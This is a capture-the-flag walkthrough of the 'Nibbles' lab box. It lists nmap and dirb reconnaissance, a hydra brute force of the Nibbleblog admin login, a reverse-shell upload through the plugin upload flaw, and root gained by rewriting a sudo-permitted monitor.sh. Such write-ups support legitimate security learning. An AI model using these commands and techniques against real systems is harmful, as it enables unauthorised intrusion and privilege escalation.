Summary

Nibbles is an easy Linux box that can be exploited by bruteforcing the administrator’s login page. After this you can install a malicious plugin due to a file upload vulnerability. Privileges can be escalated by replacing a monitoring script which can be run with sudo rights.


Discovery

Nmap discovered the following open ports and services:

nmap -sC -sV -oN fullscan -Pn 10.129.25.188/

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The first thing I checked was the webserver. The user is presented with a blank page that displays Hello world!. By checking the code (ctrl + u) it contains the following comment:

/nibbleblog/ directory. Nothing interesting here!

Naturally, you can navigate to: http://10.129.25.188/nibbleblog/.

Next, as usually, the website was bruteforced to discover hidden files and directories with dirb:

dirb http://10.129.25.188/nibbleblog/ -X .php

The results were as follows:

+ http://10.129.25.188/nibbleblog/admin.php (CODE:200|SIZE:1401)   

Brute-Forcing the Login Page

Navigating here results in a login page. This can be bruteforced with hydra like this:

hydra -l admin -P /usr/share/wordlist/rockyou.txt -vV -f -t 2 10.129.25.188 http-post-form "/nibbleblog/admin.php:username=^USER^&password=^PASS^:login_error"


[ATTEMPT] target 10.129.25.188 - login "admin" - pass "password" - 1 of 10000 [child 0] (0/0)
[ATTEMPT] target 10.129.25.188 - login "admin" - pass "123456" - 2 of 10000 [child 1] (0/0)

Hydra shows two options. Both are incorrect however. This is probably done on purpose by showing a different error message when entering these credentials. By simply guessing you will get in with admin & nibbles. Now you are presented with a standard dashboard.


Exploitation

A google search showed that:

Nibbleblog contains a flaw that allows an authenticated remote attacker to execute arbitrary PHP code. This module was tested on version 4.0.3.

Go to plugins > install and you will be able to upload a picture. This upload is vulnerable and you can simply upload a reverse shell. After clicking save changes it will display some warnings. You can ignore these and continue to http://10.129.25.190/nibbleblog/content/private/plugins/about/. It will show the php file you just uploaded and when clicking it will open a reverse shell as the user nibbler. The user.txt is in the home directory of this user.


Privilege Escalation

The next step is privilege escalation. I recommend running linpeas this gives a great deal of information such as:

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

I simply created this file:

$ cat monitor.sh
#!/bin/bash
/bin/bash

echo "worked"

By executing: sudo /home/nibbler/personal/stuff/monitor.sh you obtain a root shell and can open root.txt